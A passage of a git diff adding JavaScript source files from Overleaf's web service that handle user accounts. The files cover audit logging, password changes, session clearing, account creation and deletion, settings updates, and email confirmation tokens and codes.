identifier object from array + const thirdPartyIdentifier = user.thirdPartyIdentifiers.find( + tpi => + tpi.externalUserId === externalUserId && tpi.providerId === providerId + ) + // do recursive merge of new data over existing data + _.merge(thirdPartyIdentifier.externalData, externalData) + const update = { 'thirdPartyIdentifiers.$': thirdPartyIdentifier } + return update +} + +const ThirdPartyIdentityManager = { + getUser: callbackify(getUser), + login: callbackify(login), + link: callbackify(link), + unlink: callbackify(unlink), +} + +ThirdPartyIdentityManager.promises = { + getUser, + login, + link, + unlink, +} + +module.exports = ThirdPartyIdentityManager diff --git a/services/web/app/src/Features/User/UserAuditLogHandler.js b/services/web/app/src/Features/User/UserAuditLogHandler.js new file mode 100644 index 0000000..b1d4043 --- /dev/null +++ b/services/web/app/src/Features/User/UserAuditLogHandler.js @@ -0,0 +1,80 @@ +const OError = require('@overleaf/o-error') +const { UserAuditLogEntry } = require('../../models/UserAuditLogEntry') +const { callbackify } = require('util') + +function _canHaveNoIpAddressId(operation, info) { + if (operation === 'join-group-subscription') return true + if (operation === 'leave-group-subscription') return true + if (operation === 'must-reset-password-set') return true + if (operation === 'remove-email' && info.script) return true + if (operation === 'release-managed-user' && info.script) return true + return false +} + +function _canHaveNoInitiatorId(operation, info) { + if (operation === 'reset-password') return true + if (operation === 'unlink-sso' && info.providerId === 'collabratec') + return true + if (operation === 'unlink-sso' && info.script === true) return true + if (operation === 'unlink-institution-sso-not-migrated') return true + if (operation === 'remove-email' && info.script) return true + if (operation === 'join-group-subscription') return true + if (operation === 'leave-group-subscription') return true + if (operation === 'must-reset-password-set') return true + if (operation === 'must-reset-password-unset') return true + if (operation === 'account-suspension' && info.script) return true + if (operation === 'release-managed-user' && info.script) return true +} + +/** + * Add an audit log entry + * + * The entry should include at least the following fields: + * + * - userId: the user on behalf of whom the operation was performed + * - operation: a string identifying the type of operation + * - initiatorId: who performed the operation + * - ipAddress: the IP address of the initiator + * - info: an object detailing what happened + */ +async function addEntry(userId, operation, initiatorId, ipAddress, info = {}) { + if (!operation) { + throw new OError('missing operation for audit log', { + initiatorId, + ipAddress, + }) + } + + if (!ipAddress && !_canHaveNoIpAddressId(operation, info)) { + throw new OError('missing ipAddress for audit log', { + operation, + initiatorId, + }) + } + + if (!initiatorId && !_canHaveNoInitiatorId(operation, info)) { + throw new OError('missing initiatorId for audit log', { + operation, + ipAddress, + }) + } + + const entry = { + userId, + operation, + initiatorId, + info, + ipAddress, + } + + await UserAuditLogEntry.create(entry) +} + +const UserAuditLogHandler = { + addEntry: callbackify(addEntry), + promises: { + addEntry, + }, +} + +module.exports = UserAuditLogHandler diff --git a/services/web/app/src/Features/User/UserController.js b/services/web/app/src/Features/User/UserController.js new file mode 100644 index 0000000..e4186d3 --- /dev/null +++ b/services/web/app/src/Features/User/UserController.js @@ -0,0 +1,518 @@ +const UserHandler = require('./UserHandler') +const UserDeleter = require('./UserDeleter') +const UserGetter = require('./UserGetter') +const { User } = require('../../models/User') +const NewsletterManager = require('../Newsletter/NewsletterManager') +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') +const AuthenticationManager = require('../Authentication/AuthenticationManager') +const SessionManager = require('../Authentication/SessionManager') +const Features = require('../../infrastructure/Features') +const UserAuditLogHandler = require('./UserAuditLogHandler') +const UserSessionsManager = require('./UserSessionsManager') +const UserUpdater = require('./UserUpdater') +const Errors = require('../Errors/Errors') +const HttpErrorHandler = require('../Errors/HttpErrorHandler') +const OError = require('@overleaf/o-error') +const EmailHandler = require('../Email/EmailHandler') +const UrlHelper = require('../Helpers/UrlHelper') +const { promisify } = require('util') +const { expressify } = require('@overleaf/promise-utils') +const { + acceptsJson, +} = require('../../infrastructure/RequestContentTypeDetection') +const Modules = require('../../infrastructure/Modules') +const OneTimeTokenHandler = require('../Security/OneTimeTokenHandler') + +async function _sendSecurityAlertClearedSessions(user) { + const emailOptions = { + to: user.email, + actionDescribed: `active sessions were cleared on your account ${user.email}`, + action: 'active sessions cleared', + } + try { + await EmailHandler.promises.sendEmail('securityAlert', emailOptions) + } catch (error) { + // log error when sending security alert email but do not pass back + logger.error( + { error, userId: user._id }, + 'could not send security alert email when sessions cleared' + ) + } +} + +function _sendSecurityAlertPasswordChanged(user) { + const emailOptions = { + to: user.email, + actionDescribed: `your password has been changed on your account ${user.email}`, + action: 'password changed', + } + EmailHandler.promises + .sendEmail('securityAlert', emailOptions) + .catch(error => { + // log error when sending security alert email but do not pass back + logger.error( + { error, userId: user._id }, + 'could not send security alert email when password changed' + ) + }) +} + +async function _ensureAffiliation(userId, emailData) { + if (emailData.samlProviderId) { + await UserUpdater.promises.confirmEmail(userId, emailData.email) + } else { + await UserUpdater.promises.addAffiliationForNewUser(userId, emailData.email) + } +} + +async function changePassword(req, res, next) { + metrics.inc('user.password-change') + const userId = SessionManager.getLoggedInUserId(req.session) + + const { user } = await AuthenticationManager.promises.authenticate( + { _id: userId }, + req.body.currentPassword, + null, + { enforceHIBPCheck: false } + ) + if (!user) { + return HttpErrorHandler.badRequest( + req, + res, + req.i18n.translate('password_change_old_password_wrong') + ) + } + + if (req.body.newPassword1 !== req.body.newPassword2) { + return HttpErrorHandler.badRequest( + req, + res, + req.i18n.translate('password_change_passwords_do_not_match') + ) + } + + try { + await AuthenticationManager.promises.setUserPassword( + user, + req.body.newPassword1 + ) + } catch (error) { + if (error.name === 'InvalidPasswordError') { + const message = AuthenticationManager.getMessageForInvalidPasswordError( + error, + req + ) + return res.status(400).json({ message }) + } else if (error.name === 'PasswordMustBeDifferentError') { + return HttpErrorHandler.badRequest( + req, + res, + req.i18n.translate('password_change_password_must_be_different') + ) + } else if (error.name === 'PasswordReusedError') { + return res.status(400).json({ + message: { + key: 'password-must-be-strong', + }, + }) + } else { + throw error + } + } + await UserAuditLogHandler.promises.addEntry( + user._id, + 'update-password', + user._id, + req.ip + ) + + // no need to wait, errors are logged and not passed back + _sendSecurityAlertPasswordChanged(user) + + await UserSessionsManager.promises.removeSessionsFromRedis( + user, + req.sessionID // remove all sessions except the current session + ) + + await OneTimeTokenHandler.promises.expireAllTokensForUser( + userId.toString(), + 'password' + ) + + return res.json({ + message: { + type: 'success', + email: user.email, + text: req.i18n.translate('password_change_successful'), + }, + }) +} + +async function clearSessions(req, res, next) { + metrics.inc('user.clear-sessions') + const userId = SessionManager.getLoggedInUserId(req.session) + const user = await UserGetter.promises.getUser(userId, { email: 1 }) + const sessions = await UserSessionsManager.promises.getAllUserSessions(user, [ + req.sessionID, + ]) + await UserAuditLogHandler.promises.addEntry( + user._id, + 'clear-sessions', + user._id, + req.ip, + { sessions } + ) + await UserSessionsManager.promises.removeSessionsFromRedis( + user, + req.sessionID // remove all sessions except the current session + ) + + await _sendSecurityAlertClearedSessions(user) + + res.sendStatus(201) +} + +async function ensureAffiliation(user) { + if (!Features.hasFeature('affiliations')) { + return + } + + const flaggedEmails = user.emails.filter(email => email.affiliationUnchecked) + if (flaggedEmails.length === 0) { + return + } + + if (flaggedEmails.length > 1) { + logger.error( + { userId: user._id }, + `Unexpected number of flagged emails: ${flaggedEmails.length}` + ) + } + + await _ensureAffiliation(user._id, flaggedEmails[0]) +} + +async function ensureAffiliationMiddleware(req, res, next) { + let user + if (!Features.hasFeature('affiliations') || !req.query.ensureAffiliation) { + return next() + } + const userId = SessionManager.getLoggedInUserId(req.session) + try { + user = await UserGetter.promises.getUser(userId) + } catch (error) { + throw new Errors.UserNotFoundError({ info: { userId } }) + } + // if the user does not have permission to add an affiliation, we skip this middleware + try { + req.assertPermission('add-affiliation') + } catch (error) { + if (error instanceof Errors.ForbiddenError) { + return next() + } + } + await ensureAffiliation(user) + return next() +} + +async function tryDeleteUser(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { password } = req.body + req.logger.addFields({ userId }) + + logger.debug({ userId }, 'trying to delete user account') + if (password == null || password === '') { + logger.err({ userId }, 'no password supplied for attempt to delete account') + return res.sendStatus(403) + } + + let user + try { + user = ( + await AuthenticationManager.promises.authenticate( + { _id: userId }, + password, + null, + { enforceHIBPCheck: false } + ) + ).user + } catch (err) { + throw OError.tag( + err, + 'error authenticating during attempt to delete account', + { userId } + ) + } + + if (!user) { + logger.err({ userId }, 'auth failed during attempt to delete account') + return res.sendStatus(403) + } + + try { + await UserDeleter.promises.deleteUser(userId, { + deleterUser: user, + ipAddress: req.ip, + }) + } catch (err) { + const errorData = { + message: 'error while deleting user account', + info: { userId }, + } + if (err instanceof Errors.SubscriptionAdminDeletionError) { + // set info.public.error for JSON response so frontend can display + // a specific message + errorData.info.public = { + error: 'SubscriptionAdminDeletionError', + } + const error = OError.tag(err, errorData.message, errorData.info) + logger.warn({ error, req }, error.message) + return HttpErrorHandler.unprocessableEntity( + req, + res, + errorData.message, + errorData.info.public + ) + } else { + throw OError.tag(err, errorData.message, errorData.info) + } + } + + await Modules.promises.hooks.fire('tryDeleteV1Account', user) + + const sessionId = req.sessionID + + if (typeof req.logout === 'function') { + const logout = promisify(req.logout) + await logout() + } + + const destroySession = promisify(req.session.destroy.bind(req.session)) + await destroySession() + + UserSessionsManager.promises.untrackSession(user, sessionId).catch(err => { + logger.warn({ err, userId: user._id }, 'failed to untrack session') + }) + res.sendStatus(200) +} + +async function subscribe(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + req.logger.addFields({ userId }) + + const user = await UserGetter.promises.getUser(userId, { + _id: 1, + email: 1, + first_name: 1, + last_name: 1, + }) + await NewsletterManager.promises.subscribe(user) + res.json({ + message: req.i18n.translate('thanks_settings_updated'), + }) +} + +async function unsubscribe(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + req.logger.addFields({ userId }) + + const user = await UserGetter.promises.getUser(userId, { + _id: 1, + email: 1, + first_name: 1, + last_name: 1, + }) + await NewsletterManager.promises.unsubscribe(user) + await Modules.promises.hooks.fire('newsletterUnsubscribed', user) + res.json({ + message: req.i18n.translate('thanks_settings_updated'), + }) +} + +async function updateUserSettings(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + req.logger.addFields({ userId }) + + const user = await User.findById(userId).exec() + if (user == null) { + throw new OError('problem updating user settings', { userId }) + } + + if (req.body.first_name != null) { + user.first_name = req.body.first_name.trim() + } + if (req.body.last_name != null) { + user.last_name = req.body.last_name.trim() + } + if (req.body.role != null) { + user.role = req.body.role.trim() + } + if (req.body.institution != null) { + user.institution = req.body.institution.trim() + } + if (req.body.mode != null) { + user.ace.mode = req.body.mode + } + if (req.body.editorTheme != null) { + user.ace.theme = req.body.editorTheme + } + if (req.body.overallTheme != null) { + user.ace.overallTheme = req.body.overallTheme + } + if (req.body.fontSize != null) { + user.ace.fontSize = req.body.fontSize + } + if (req.body.autoComplete != null) { + user.ace.autoComplete = req.body.autoComplete + } + if (req.body.autoPairDelimiters != null) { + user.ace.autoPairDelimiters = req.body.autoPairDelimiters + } + if (req.body.spellCheckLanguage != null) { + user.ace.spellCheckLanguage = req.body.spellCheckLanguage + } + if (req.body.pdfViewer != null) { + user.ace.pdfViewer = req.body.pdfViewer + } + if (req.body.syntaxValidation != null) { + user.ace.syntaxValidation = req.body.syntaxValidation + } + if (req.body.fontFamily != null) { + user.ace.fontFamily = req.body.fontFamily + } + if (req.body.lineHeight != null) { + user.ace.lineHeight = req.body.lineHeight + } + if (req.body.mathPreview != null) { + user.ace.mathPreview = req.body.mathPreview + } + if (req.body.referencesSearchMode != null) { + const mode = + req.body.referencesSearchMode === 'simple' ? 'simple' : 'advanced' + user.ace.referencesSearchMode = mode + } + if (req.body.enableNewEditor != null) { + user.ace.enableNewEditor = Boolean(req.body.enableNewEditor) + } + await user.save() + + const newEmail = req.body.email?.trim().toLowerCase() + if ( + newEmail == null || + newEmail === user.email || + req.externalAuthenticationSystemUsed() + ) { + // end here, don't update email + SessionManager.setInSessionUser(req.session, { + first_name: user.first_name, + last_name: user.last_name, + }) + res.sendStatus(200) + } else if (newEmail.indexOf('@') === -1) { + // email invalid + res.sendStatus(400) + } else { + // update the user email + const auditLog = { + initiatorId: userId, + ipAddress: req.ip, + } + + try { + await UserUpdater.promises.changeEmailAddress(userId, newEmail, auditLog) + } catch (err) { + if (err instanceof Errors.EmailExistsError) { + const translation = req.i18n.translate('email_already_registered') + return HttpErrorHandler.conflict(req, res, translation) + } else { + return HttpErrorHandler.legacyInternal( + req, + res, + req.i18n.translate('problem_changing_email_address'), + OError.tag(err, 'problem_changing_email_address', { + userId, + newEmail, + }) + ) + } + } + + const user = await User.findById(userId).exec() + SessionManager.setInSessionUser(req.session, { + email: user.email, + first_name: user.first_name, + last_name: user.last_name, + }) + + try { + await UserHandler.promises.populateTeamInvites(user) + } catch (err) { + logger.error({ err }, 'error populateTeamInvites') + } + + res.sendStatus(200) + } +} + +async function doLogout(req) { + metrics.inc('user.logout') + const user = SessionManager.getSessionUser(req.session) + logger.debug({ user }, 'logging out') + const sessionId = req.sessionID + + if (typeof req.logout === 'function') { + // passport logout + const logout = promisify(req.logout.bind(req)) + await logout() + } + + const destroySession = promisify(req.session.destroy.bind(req.session)) + await destroySession() + + if (user != null) { + UserSessionsManager.promises.untrackSession(user, sessionId).catch(err => { + logger.warn({ err, userId: user._id }, 'failed to untrack session') + }) + } +} + +async function logout(req, res, next) { + const requestedRedirect = req.body.redirect + ? UrlHelper.getSafeRedirectPath(req.body.redirect) + : undefined + const redirectUrl = requestedRedirect || '/login' + + await doLogout(req) + + if (acceptsJson(req)) { + res.status(200).json({ redir: redirectUrl }) + } else { + res.redirect(redirectUrl) + } +} + +async function expireDeletedUser(req, res, next) { + const userId = req.params.userId + await UserDeleter.promises.expireDeletedUser(userId) + res.sendStatus(204) +} + +async function expireDeletedUsersAfterDuration(req, res, next) { + await UserDeleter.promises.expireDeletedUsersAfterDuration() + res.sendStatus(204) +} + +module.exports = { + clearSessions: expressify(clearSessions), + changePassword: expressify(changePassword), + tryDeleteUser: expressify(tryDeleteUser), + subscribe: expressify(subscribe), + unsubscribe: expressify(unsubscribe), + updateUserSettings: expressify(updateUserSettings), + logout: expressify(logout), + expireDeletedUser: expressify(expireDeletedUser), + expireDeletedUsersAfterDuration: expressify(expireDeletedUsersAfterDuration), + ensureAffiliationMiddleware: expressify(ensureAffiliationMiddleware), + ensureAffiliation, +} diff --git a/services/web/app/src/Features/User/UserCreator.js b/services/web/app/src/Features/User/UserCreator.js new file mode 100644 index 0000000..390d925 --- /dev/null +++ b/services/web/app/src/Features/User/UserCreator.js @@ -0,0 +1,145 @@ +const logger = require('@overleaf/logger') +const util = require('util') +const { AffiliationError } = require('../Errors/Errors') +const Features = require('../../infrastructure/Features') +const { User } = require('../../models/User') +const UserDeleter = require('./UserDeleter') +const UserGetter = require('./UserGetter') +const UserUpdater = require('./UserUpdater') +const Analytics = require('../Analytics/AnalyticsManager') +const UserOnboardingEmailManager = require('./UserOnboardingEmailManager') +const UserPostRegistrationAnalyticsManager = require('./UserPostRegistrationAnalyticsManager') +const OError = require('@overleaf/o-error') + +async function _addAffiliation(user, affiliationOptions) { + try { + await UserUpdater.promises.addAffiliationForNewUser( + user._id, + user.email, + affiliationOptions + ) + } catch (error) { + throw new AffiliationError('add affiliation failed').withCause(error) + } + + try { + user = await UserGetter.promises.getUser(user._id) + } catch (error) { + logger.error( + OError.tag(error, 'could not get fresh user data', { + userId: user._id, + email: user.email, + }) + ) + } + return user +} + +async function recordRegistrationEvent(user) { + try { + const segmentation = { + 'home-registration': 'default', + } + if (user.thirdPartyIdentifiers && user.thirdPartyIdentifiers.length > 0) { + segmentation.provider = user.thirdPartyIdentifiers[0].providerId + } + Analytics.recordEventForUserInBackground( + user._id, + 'user-registered', + segmentation + ) + } catch (err) { + logger.warn({ err }, 'there was an error recording `user-registered` event') + } +} + +async function createNewUser(attributes, options = {}) { + let user = new User() + + if (attributes.first_name == null || attributes.first_name === '') { + attributes.first_name = attributes.email.split('@')[0] + } + + Object.assign(user, attributes) + + user.ace.syntaxValidation = true + + const reversedHostname = user.email.split('@')[1].split('').reverse().join('') + + const emailData = { + email: user.email, + createdAt: new Date(), + reversedHostname, + } + if (Features.hasFeature('affiliations')) { + emailData.affiliationUnchecked = true + } + if ( + attributes.samlIdentifiers && + attributes.samlIdentifiers[0] && + attributes.samlIdentifiers[0].providerId + ) { + emailData.samlProviderId = attributes.samlIdentifiers[0].providerId + } + + const affiliationOptions = options.affiliationOptions || {} + + if (options.confirmedAt) { + emailData.confirmedAt = options.confirmedAt + affiliationOptions.confirmedAt = options.confirmedAt + } + user.emails = [emailData] + + user = await user.save() + + if (Features.hasFeature('affiliations')) { + try { + user = await _addAffiliation(user, affiliationOptions) + } catch (error) { + if (options.requireAffiliation) { + await UserDeleter.promises.deleteMongoUser(user._id) + throw OError.tag(error) + } else { + const err = OError.tag(error, 'adding affiliations failed') + logger.error({ err, userId: user._id }, err.message) + } + } + } + + await recordRegistrationEvent(user) + await Analytics.setUserPropertyForUser(user._id, 'created-at', new Date()) + await Analytics.setUserPropertyForUser(user._id, 'user-id', user._id) + if (attributes.analyticsId) { + await Analytics.setUserPropertyForUser( + user._id, + 'analytics-id', + attributes.analyticsId + ) + } + + if (Features.hasFeature('saas')) { + try { + await UserOnboardingEmailManager.scheduleOnboardingEmail(user) + await UserPostRegistrationAnalyticsManager.schedulePostRegistrationAnalytics( + user + ) + } catch (error) { + logger.error( + OError.tag(error, 'Failed to schedule sending of onboarding email', { + userId: user._id, + }) + ) + } + } + + return user +} + +const UserCreator = { + createNewUser: util.callbackify(createNewUser), + promises: { + createNewUser, + }, +} + +module.exports = UserCreator diff --git a/services/web/app/src/Features/User/UserDeleter.js b/services/web/app/src/Features/User/UserDeleter.js new file mode 100644 index 0000000..4009419 --- /dev/null +++ b/services/web/app/src/Features/User/UserDeleter.js @@ -0,0 +1,174 @@ +const { callbackify } = require('util') +const logger = require('@overleaf/logger') +const moment = require('moment') +const { User } = require('../../models/User') +const { DeletedUser } = require('../../models/DeletedUser') +const { UserAuditLogEntry } = require('../../models/UserAuditLogEntry') +const { Feedback } = require('../../models/Feedback') +const NewsletterManager = require('../Newsletter/NewsletterManager') +const ProjectDeleter = require('../Project/ProjectDeleter') +const SubscriptionHandler = require('../Subscription/SubscriptionHandler') +const SubscriptionUpdater = require('../Subscription/SubscriptionUpdater') +const SubscriptionLocator = require('../Subscription/SubscriptionLocator') +const UserMembershipsHandler = require('../UserMembership/UserMembershipsHandler') +const UserSessionsManager = require('./UserSessionsManager') +const UserAuditLogHandler = require('./UserAuditLogHandler') +const InstitutionsAPI = require('../Institutions/InstitutionsAPI') +const Modules = require('../../infrastructure/Modules') +const Errors = require('../Errors/Errors') +const OnboardingDataCollectionManager = require('../OnboardingDataCollection/OnboardingDataCollectionManager') +const EmailHandler = require('../Email/EmailHandler') + +module.exports = { + deleteUser: callbackify(deleteUser), + deleteMongoUser: callbackify(deleteMongoUser), + expireDeletedUser: callbackify(expireDeletedUser), + ensureCanDeleteUser: callbackify(ensureCanDeleteUser), + expireDeletedUsersAfterDuration: callbackify(expireDeletedUsersAfterDuration), + + promises: { + deleteUser, + deleteMongoUser, + expireDeletedUser, + ensureCanDeleteUser, + expireDeletedUsersAfterDuration, + }, +} + +async function deleteUser(userId, options) { + if (!userId) { + logger.warn('user_id is null when trying to delete user') + throw new Error('no user_id') + } + + try { + const user = await User.findById(userId).exec() + logger.debug({ user }, 'deleting user') + + await ensureCanDeleteUser(user) + await _cleanupUser(user) + await Modules.promises.hooks.fire('deleteUser', userId) + await UserAuditLogHandler.promises.addEntry( + userId, + 'delete-account', + options.deleterUser ? options.deleterUser._id : userId, + options.ipAddress + ) + await _createDeletedUser(user, options) + await ProjectDeleter.promises.deleteUsersProjects(user._id) + await _sendDeleteEmail(user, options.force) + await deleteMongoUser(user._id) + } catch (error) { + logger.warn({ error, userId }, 'something went wrong deleting the user') + throw error + } +} + +/** + * delete a user document only + */ +async function deleteMongoUser(userId) { + if (!userId) { + throw new Error('no user_id') + } + + await User.deleteOne({ _id: userId }).exec() +} + +async function expireDeletedUser(userId) { + await Modules.promises.hooks.fire('expireDeletedUser', userId) + const deletedUser = await DeletedUser.findOne({ + 'deleterData.deletedUserId': userId, + }).exec() + + await Feedback.deleteMany({ userId }).exec() + await OnboardingDataCollectionManager.deleteOnboardingDataCollection(userId) + + deletedUser.user = undefined + deletedUser.deleterData.deleterIpAddress = undefined + await deletedUser.save() +} + +async function expireDeletedUsersAfterDuration() { + const DURATION = 90 + const deletedUsers = await DeletedUser.find({ + 'deleterData.deletedAt': { + $lt: new Date(moment().subtract(DURATION, 'days')), + }, + user: { $type: 'object' }, + }).exec() + + if (deletedUsers.length === 0) { + return + } + + for (let i = 0; i < deletedUsers.length; i++) { + const deletedUserId = deletedUsers[i].deleterData.deletedUserId + await expireDeletedUser(deletedUserId) + await UserAuditLogEntry.deleteMany({ userId: deletedUserId }).exec() + } +} + +async function ensureCanDeleteUser(user) { + const subscription = + await SubscriptionLocator.promises.getUsersSubscription(user) + if (subscription) { + throw new Errors.SubscriptionAdminDeletionError({}) + } +} + +async function _sendDeleteEmail(user, force) { + const emailOptions = { + to: user.email, + action: 'account deleted', + actionDescribed: 'your Overleaf account was deleted', + } + try { + await EmailHandler.promises.sendEmail('securityAlert', emailOptions) + } catch (error) { + if (force) { + logger.error( + { error }, + 'error sending account deletion email notification' + ) + } else { + throw error + } + } +} + +async function _createDeletedUser(user, options) { + await DeletedUser.updateOne( + { 'deleterData.deletedUserId': user._id }, + { + user, + deleterData: { + deletedAt: new Date(), + deleterId: options.deleterUser ? options.deleterUser._id : undefined, + deleterIpAddress: options.ipAddress, + deletedUserId: user._id, + deletedUserLastLoggedIn: user.lastLoggedIn, + deletedUserSignUpDate: user.signUpDate, + deletedUserLoginCount: user.loginCount, + deletedUserReferralId: user.referal_id, + deletedUserReferredUsers: user.refered_users, + deletedUserReferredUserCount: user.refered_user_count, + deletedUserOverleafId: user.overleaf ? user.overleaf.id : undefined, + }, + }, + { upsert: true } + ) +} + +async function _cleanupUser(user) { + await UserSessionsManager.promises.removeSessionsFromRedis(user) + await NewsletterManager.promises.unsubscribe(user, { delete: true }) + await SubscriptionHandler.promises.cancelSubscription(user) + await InstitutionsAPI.promises.deleteAffiliations(user._id) + await SubscriptionUpdater.promises.removeUserFromAllGroups(user._id) + await UserMembershipsHandler.promises.removeUserFromAllEntities(user._id) + await Modules.promises.hooks.fire('cleanupPersonalAccessTokens', user._id, [ + 'collabratec', + 'git_bridge', + ]) +} diff --git a/services/web/app/src/Features/User/UserEmailsConfirmationHandler.js b/services/web/app/src/Features/User/UserEmailsConfirmationHandler.js new file mode 100644 index 0000000..b349c97 --- /dev/null +++ b/services/web/app/src/Features/User/UserEmailsConfirmationHandler.js @@ -0,0 +1,139 @@ +const EmailHelper = require('../Helpers/EmailHelper') +const EmailHandler = require('../Email/EmailHandler') +const OneTimeTokenHandler = require('../Security/OneTimeTokenHandler') +const settings = require('@overleaf/settings') +const Errors = require('../Errors/Errors') +const UserUpdater = require('./UserUpdater') +const UserGetter = require('./UserGetter') +const { callbackify, promisify } = require('util') +const crypto = require('crypto') +const SessionManager = require('../Authentication/SessionManager') + +// Reject email confirmation tokens after 90 days +const TOKEN_EXPIRY_IN_S = 90 * 24 * 60 * 60 +const TOKEN_USE = 'email_confirmation' +const CONFIRMATION_CODE_EXPIRY_IN_S = 10 * 60 + +function sendConfirmationEmail(userId, email, emailTemplate, callback) { + if (arguments.length === 3) { + callback = emailTemplate + emailTemplate = 'confirmEmail' + } + + email = EmailHelper.parseEmail(email) + if (!email) { + return callback(new Error('invalid email')) + } + const data = { user_id: userId, email } + OneTimeTokenHandler.getNewToken( + TOKEN_USE, + data, + { expiresIn: TOKEN_EXPIRY_IN_S }, + function (err, token) { + if (err) { + return callback(err) + } + const emailOptions = { + to: email, + confirmEmailUrl: `${settings.siteUrl}/user/emails/confirm?token=${token}`, + sendingUser_id: userId, + } + EmailHandler.sendEmail(emailTemplate, emailOptions, callback) + } + ) +} + +async function sendConfirmationCode(email, welcomeUser) { + if (!EmailHelper.parseEmail(email)) { + throw new Error('invalid email') + } + + const confirmCode = crypto.randomInt(0, 1_000_000).toString().padStart(6, '0') + const confirmCodeExpiresTimestamp = + Date.now() + CONFIRMATION_CODE_EXPIRY_IN_S * 1000 + + await EmailHandler.promises.sendEmail('confirmCode', { + to: email, + confirmCode, + welcomeUser, + category: ['ConfirmEmail'], + }) + + return { + confirmCode, + confirmCodeExpiresTimestamp, + } +} + +async function sendReconfirmationEmail(userId, email) { + email = EmailHelper.parseEmail(email) + if (!email) { + throw new Error('invalid email') + } + + const data = { user_id: userId, email } + const token = await OneTimeTokenHandler.promises.getNewToken( + TOKEN_USE, + data, + { expiresIn: TOKEN_EXPIRY_IN_S } + ) + + const emailOptions = { + to: email, + confirmEmailUrl: `${settings.siteUrl}/user/emails/confirm?token=${token}`, + sendingUser_id: userId, + } + + await EmailHandler.promises.sendEmail('reconfirmEmail', emailOptions) +} + +async function confirmEmailFromToken(req, token) { + const { data } = await OneTimeTokenHandler.promises.peekValueFromToken( + TOKEN_USE, + token + ) + if (!data) { + throw new Errors.NotFoundError('no token found') + } + + const loggedInUserId = SessionManager.getLoggedInUserId(req.session) + // user_id may be stored as an ObjectId or string + const userId = data.user_id?.toString() + const email = data.email + if (!userId || email !== EmailHelper.parseEmail(email)) { + throw new Errors.NotFoundError('invalid data') + } + if (loggedInUserId !== userId) { + throw new Errors.ForbiddenError('logged in user does not match token user') + } + const user = await UserGetter.promises.getUser(userId, { emails: 1 }) + if (!user) { + throw new Errors.NotFoundError('user not found') + } + const emailExists = user.emails.some(emailData => emailData.email === email) + if (!emailExists) { + throw new Errors.NotFoundError('email missing for user') + } + + await OneTimeTokenHandler.promises.expireToken(TOKEN_USE, token) + await UserUpdater.promises.confirmEmail(userId, email) + + return { userId, email } +} + +const UserEmailsConfirmationHandler = { + sendConfirmationEmail, + + sendReconfirmationEmail: callbackify(sendReconfirmationEmail), + + confirmEmailFromToken: callbackify(confirmEmailFromToken), +} + +UserEmailsConfirmationHandler.promises = { + sendConfirmationEmail: promisify(sendConfirmationEmail), + confirmEmailFromToken, + sendConfirmationCode, + sendReconfirmationEmail, +} + +module.exports = UserEmailsConfirmationHandler diff --git a/services/web/app/src/Features/User/UserEmailsController.js b/services/web/app/src/Features/User/UserEmailsController.js new file mode 100644 index 0000000..54ace10 --- /dev/null +++ b/services/web/app/src/Features/User/UserEmailsController.js @@ -0,0 +1,829 @@ +const AuthenticationController = require('../Authentication/AuthenticationController') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const SessionManager = require('../Authentication/SessionManager') +const UserGetter = require('./UserGetter') +const UserUpdater = require('./UserUpdater') +const UserSessionsManager = require('./UserSessionsManager') +const EmailHandler = require('../Email/EmailHandler') +const EmailHelper = require('../Helpers/EmailHelper') +const UserEmailsConfirmationHandler = require('./UserEmailsConfirmationHandler') +const { endorseAffiliation } = require('../Institutions/InstitutionsAPI') +const Errors = require('../Errors/Errors') +const HttpErrorHandler = require('../Errors/HttpErrorHandler') +const { expressify } = require('@overleaf/promise-utils') +const AsyncFormHelper = require('../Helpers/AsyncFormHelper') +const AnalyticsManager = require('../Analytics/AnalyticsManager') +const UserPrimaryEmailCheckHandler = require('../User/UserPrimaryEmailCheckHandler') +const UserAuditLogHandler = require('./UserAuditLogHandler') +const { RateLimiter } = require('../../infrastructure/RateLimiter') +const Features = require('../../infrastructure/Features') +const tsscmp = require('tsscmp') +const Modules = require('../../infrastructure/Modules') +const SplitTestHandler = require('../SplitTests/SplitTestHandler') + +const AUDIT_LOG_TOKEN_PREFIX_LENGTH = 10 + +const sendConfirmCodeRateLimiter = new RateLimiter('send-confirmation-code', { + points: 1, + duration: 60, +}) +const checkConfirmCodeRateLimiter = new RateLimiter( + 'check-confirmation-code-per-email', + { + points: 10, + duration: 60, + } +) +const resendConfirmCodeRateLimiter = new RateLimiter( + 'resend-confirmation-code', + { + points: 1, + duration: 60, + } +) + +async function _sendSecurityAlertEmail(user, email) { + const emailOptions = { + to: user.email, + actionDescribed: `a secondary email address has been added to your account ${user.email}`, + message: [ + `<span style="display:inline-block;padding: 0 20px;width:100%;">Added: <br/><b>${email}</b></span>`, + ], + action: 'secondary email address added', + } + await EmailHandler.promises.sendEmail('securityAlert', emailOptions) +} + +/** + * This method is for adding a secondary email to be confirmed via an emailed link. + * For code confirmation, see the `addWithConfirmationCode` method in this file. + */ +async function add(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + const email = EmailHelper.parseEmail(req.body.email) + if (!email) { + return res.sendStatus(422) + } + const user = await UserGetter.promises.getUser(userId, { + email: 1, + 'emails.email': 1, + }) + + if (user.emails.length >= Settings.emailAddressLimit) { + return res.status(422).json({ message: 'secondary email limit exceeded' }) + } + + const affiliationOptions = { + university: req.body.university, + role: req.body.role, + department: req.body.department, + } + + try { + await UserUpdater.promises.addEmailAddress( + userId, + email, + affiliationOptions, + { + initiatorId: user._id, + ipAddress: req.ip, + } + ) + } catch (error) { + return UserEmailsController._handleEmailError(error, req, res, next) + } + + await _sendSecurityAlertEmail(user, email) + + await UserEmailsConfirmationHandler.promises.sendConfirmationEmail( + userId, + email + ) + + res.sendStatus(204) +} + +async function resendConfirmation(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const email = EmailHelper.parseEmail(req.body.email) + if (!email) { + return res.sendStatus(422) + } + const user = await UserGetter.promises.getUserByAnyEmail(email, { _id: 1 }) + + if (!user || user._id.toString() !== userId) { + return res.sendStatus(422) + } + + await UserEmailsConfirmationHandler.promises.sendConfirmationEmail( + userId, + email + ) + res.sendStatus(200) +} + +async function sendReconfirmation(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + 